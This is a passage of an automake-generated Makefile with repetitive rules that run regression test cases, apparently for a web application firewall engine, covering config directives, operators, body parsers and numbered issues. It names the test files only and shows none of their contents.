@p='test/test-cases/regression/config-body_limits.json'; \ b='test/test-cases/regression/config-body_limits.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-calling_phases_by_name.json.log: test/test-cases/regression/config-calling_phases_by_name.json @p='test/test-cases/regression/config-calling_phases_by_name.json'; \ b='test/test-cases/regression/config-calling_phases_by_name.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-include-bad.json.log: test/test-cases/regression/config-include-bad.json @p='test/test-cases/regression/config-include-bad.json'; \ b='test/test-cases/regression/config-include-bad.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-include.json.log: test/test-cases/regression/config-include.json @p='test/test-cases/regression/config-include.json'; \ b='test/test-cases/regression/config-include.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-remove_by_id.json.log: test/test-cases/regression/config-remove_by_id.json @p='test/test-cases/regression/config-remove_by_id.json'; \ b='test/test-cases/regression/config-remove_by_id.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-remove_by_msg.json.log: test/test-cases/regression/config-remove_by_msg.json @p='test/test-cases/regression/config-remove_by_msg.json'; \ b='test/test-cases/regression/config-remove_by_msg.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-remove_by_tag.json.log: test/test-cases/regression/config-remove_by_tag.json @p='test/test-cases/regression/config-remove_by_tag.json'; \ b='test/test-cases/regression/config-remove_by_tag.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-response_type.json.log: test/test-cases/regression/config-response_type.json @p='test/test-cases/regression/config-response_type.json'; \ b='test/test-cases/regression/config-response_type.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-secdefaultaction.json.log: test/test-cases/regression/config-secdefaultaction.json @p='test/test-cases/regression/config-secdefaultaction.json'; \ b='test/test-cases/regression/config-secdefaultaction.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-secremoterules.json.log: test/test-cases/regression/config-secremoterules.json @p='test/test-cases/regression/config-secremoterules.json'; \ b='test/test-cases/regression/config-secremoterules.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-update-action-by-id.json.log: test/test-cases/regression/config-update-action-by-id.json @p='test/test-cases/regression/config-update-action-by-id.json'; \ b='test/test-cases/regression/config-update-action-by-id.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-update-target-by-id.json.log: test/test-cases/regression/config-update-target-by-id.json @p='test/test-cases/regression/config-update-target-by-id.json'; \ b='test/test-cases/regression/config-update-target-by-id.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-update-target-by-msg.json.log: test/test-cases/regression/config-update-target-by-msg.json @p='test/test-cases/regression/config-update-target-by-msg.json'; \ b='test/test-cases/regression/config-update-target-by-msg.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-update-target-by-tag.json.log: test/test-cases/regression/config-update-target-by-tag.json @p='test/test-cases/regression/config-update-target-by-tag.json'; \ b='test/test-cases/regression/config-update-target-by-tag.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/config-xml_external_entity.json.log: test/test-cases/regression/config-xml_external_entity.json @p='test/test-cases/regression/config-xml_external_entity.json'; \ b='test/test-cases/regression/config-xml_external_entity.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/debug_log.json.log: test/test-cases/regression/debug_log.json @p='test/test-cases/regression/debug_log.json'; \ b='test/test-cases/regression/debug_log.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/directive-sec_rule_script.json.log: test/test-cases/regression/directive-sec_rule_script.json @p='test/test-cases/regression/directive-sec_rule_script.json'; \ b='test/test-cases/regression/directive-sec_rule_script.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1152.json.log: test/test-cases/regression/issue-1152.json @p='test/test-cases/regression/issue-1152.json'; \ b='test/test-cases/regression/issue-1152.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1528.json.log: test/test-cases/regression/issue-1528.json @p='test/test-cases/regression/issue-1528.json'; \ b='test/test-cases/regression/issue-1528.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1565.json.log: test/test-cases/regression/issue-1565.json @p='test/test-cases/regression/issue-1565.json'; \ b='test/test-cases/regression/issue-1565.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1576.json.log: test/test-cases/regression/issue-1576.json @p='test/test-cases/regression/issue-1576.json'; \ b='test/test-cases/regression/issue-1576.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1591.json.log: test/test-cases/regression/issue-1591.json @p='test/test-cases/regression/issue-1591.json'; \ b='test/test-cases/regression/issue-1591.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1725.json.log: test/test-cases/regression/issue-1725.json @p='test/test-cases/regression/issue-1725.json'; \ b='test/test-cases/regression/issue-1725.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1743.json.log: test/test-cases/regression/issue-1743.json @p='test/test-cases/regression/issue-1743.json'; \ b='test/test-cases/regression/issue-1743.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1785.json.log: test/test-cases/regression/issue-1785.json @p='test/test-cases/regression/issue-1785.json'; \ b='test/test-cases/regression/issue-1785.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1812.json.log: test/test-cases/regression/issue-1812.json @p='test/test-cases/regression/issue-1812.json'; \ b='test/test-cases/regression/issue-1812.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1831.json.log: test/test-cases/regression/issue-1831.json @p='test/test-cases/regression/issue-1831.json'; \ b='test/test-cases/regression/issue-1831.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1844.json.log: test/test-cases/regression/issue-1844.json @p='test/test-cases/regression/issue-1844.json'; \ b='test/test-cases/regression/issue-1844.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1850.json.log: test/test-cases/regression/issue-1850.json @p='test/test-cases/regression/issue-1850.json'; \ b='test/test-cases/regression/issue-1850.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1941.json.log: test/test-cases/regression/issue-1941.json @p='test/test-cases/regression/issue-1941.json'; \ b='test/test-cases/regression/issue-1941.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1943.json.log: test/test-cases/regression/issue-1943.json @p='test/test-cases/regression/issue-1943.json'; \ b='test/test-cases/regression/issue-1943.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1956.json.log: test/test-cases/regression/issue-1956.json @p='test/test-cases/regression/issue-1956.json'; \ b='test/test-cases/regression/issue-1956.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-1960.json.log: test/test-cases/regression/issue-1960.json @p='test/test-cases/regression/issue-1960.json'; \ b='test/test-cases/regression/issue-1960.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-2099.json.log: test/test-cases/regression/issue-2099.json @p='test/test-cases/regression/issue-2099.json'; \ b='test/test-cases/regression/issue-2099.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-2111.json.log: test/test-cases/regression/issue-2111.json @p='test/test-cases/regression/issue-2111.json'; \ b='test/test-cases/regression/issue-2111.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-394.json.log: test/test-cases/regression/issue-394.json @p='test/test-cases/regression/issue-394.json'; \ b='test/test-cases/regression/issue-394.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-849.json.log: test/test-cases/regression/issue-849.json @p='test/test-cases/regression/issue-849.json'; \ b='test/test-cases/regression/issue-849.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/issue-960.json.log: test/test-cases/regression/issue-960.json @p='test/test-cases/regression/issue-960.json'; \ b='test/test-cases/regression/issue-960.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/misc.json.log: test/test-cases/regression/misc.json @p='test/test-cases/regression/misc.json'; \ b='test/test-cases/regression/misc.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/misc-variable-under-quotes.json.log: test/test-cases/regression/misc-variable-under-quotes.json @p='test/test-cases/regression/misc-variable-under-quotes.json'; \ b='test/test-cases/regression/misc-variable-under-quotes.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/offset-variable.json.log: test/test-cases/regression/offset-variable.json @p='test/test-cases/regression/offset-variable.json'; \ b='test/test-cases/regression/offset-variable.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-detectsqli.json.log: test/test-cases/regression/operator-detectsqli.json @p='test/test-cases/regression/operator-detectsqli.json'; \ b='test/test-cases/regression/operator-detectsqli.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-detectxss.json.log: test/test-cases/regression/operator-detectxss.json @p='test/test-cases/regression/operator-detectxss.json'; \ b='test/test-cases/regression/operator-detectxss.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-fuzzyhash.json.log: test/test-cases/regression/operator-fuzzyhash.json @p='test/test-cases/regression/operator-fuzzyhash.json'; \ b='test/test-cases/regression/operator-fuzzyhash.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-inpectFile.json.log: test/test-cases/regression/operator-inpectFile.json @p='test/test-cases/regression/operator-inpectFile.json'; \ b='test/test-cases/regression/operator-inpectFile.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-ipMatchFromFile.json.log: test/test-cases/regression/operator-ipMatchFromFile.json @p='test/test-cases/regression/operator-ipMatchFromFile.json'; \ b='test/test-cases/regression/operator-ipMatchFromFile.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-pm.json.log: test/test-cases/regression/operator-pm.json @p='test/test-cases/regression/operator-pm.json'; \ b='test/test-cases/regression/operator-pm.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-rx.json.log: test/test-cases/regression/operator-rx.json @p='test/test-cases/regression/operator-rx.json'; \ b='test/test-cases/regression/operator-rx.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-UnconditionalMatch.json.log: test/test-cases/regression/operator-UnconditionalMatch.json @p='test/test-cases/regression/operator-UnconditionalMatch.json'; \ b='test/test-cases/regression/operator-UnconditionalMatch.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-validate-byte-range.json.log: test/test-cases/regression/operator-validate-byte-range.json @p='test/test-cases/regression/operator-validate-byte-range.json'; \ b='test/test-cases/regression/operator-validate-byte-range.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-verifycc.json.log: test/test-cases/regression/operator-verifycc.json @p='test/test-cases/regression/operator-verifycc.json'; \ b='test/test-cases/regression/operator-verifycc.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-verifycpf.json.log: test/test-cases/regression/operator-verifycpf.json @p='test/test-cases/regression/operator-verifycpf.json'; \ b='test/test-cases/regression/operator-verifycpf.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-verifyssn.json.log: test/test-cases/regression/operator-verifyssn.json @p='test/test-cases/regression/operator-verifyssn.json'; \ b='test/test-cases/regression/operator-verifyssn.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/operator-verifysvnr.json.log: test/test-cases/regression/operator-verifysvnr.json @p='test/test-cases/regression/operator-verifysvnr.json'; \ b='test/test-cases/regression/operator-verifysvnr.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/request-body-parser-json.json.log: test/test-cases/regression/request-body-parser-json.json @p='test/test-cases/regression/request-body-parser-json.json'; \ b='test/test-cases/regression/request-body-parser-json.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/request-body-parser-multipart-crlf.json.log: test/test-cases/regression/request-body-parser-multipart-crlf.json @p='test/test-cases/regression/request-body-parser-multipart-crlf.json'; \ b='test/test-cases/regression/request-body-parser-multipart-crlf.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/request-body-parser-multipart.json.log: test/test-cases/regression/request-body-parser-multipart.json @p='test/test-cases/regression/request-body-parser-multipart.json'; \ b='test/test-cases/regression/request-body-parser-multipart.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/request-body-parser-xml.json.log: test/test-cases/regression/request-body-parser-xml.json @p='test/test-cases/regression/request-body-parser-xml.json'; \ b='test/test-cases/regression/request-body-parser-xml.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/request-body-parser-xml-validade-dtd.json.log: test/test-cases/regression/request-body-parser-xml-validade-dtd.json @p='test/test-cases/regression/request-body-parser-xml-validade-dtd.json'; \ b='test/test-cases/regression/request-body-parser-xml-validade-dtd.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/rule-920120.json.log: test/test-cases/regression/rule-920120.json @p='test/test-cases/regression/rule-920120.json'; \ b='test/test-cases/regression/rule-920120.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/rule-920200.json.log: test/test-cases/regression/rule-920200.json @p='test/test-cases/regression/rule-920200.json'; \ b='test/test-cases/regression/rule-920200.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/rule-920274.json.log: test/test-cases/regression/rule-920274.json @p='test/test-cases/regression/rule-920274.json'; \ b='test/test-cases/regression/rule-920274.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" $(AM_TESTS_FD_REDIRECT) test/test-cases/regression/secaction.json.log: test/test-cases/regression/secaction.json @p='test/test-cases/regression/secaction.json'; \ b='test/test-cases/regression/secaction.json'; \ $(am__check_pre) $(LOG_DRIVER) --test-name "$$f" \ --log-file $$b.log --trs-file $$b.trs \ $(am__common_driver_flags) $(AM_LOG_DRIVER_FLAGS) $(LOG_DRIVER_FLAGS) -- $(LOG_COMPILE) \ "$$tst" 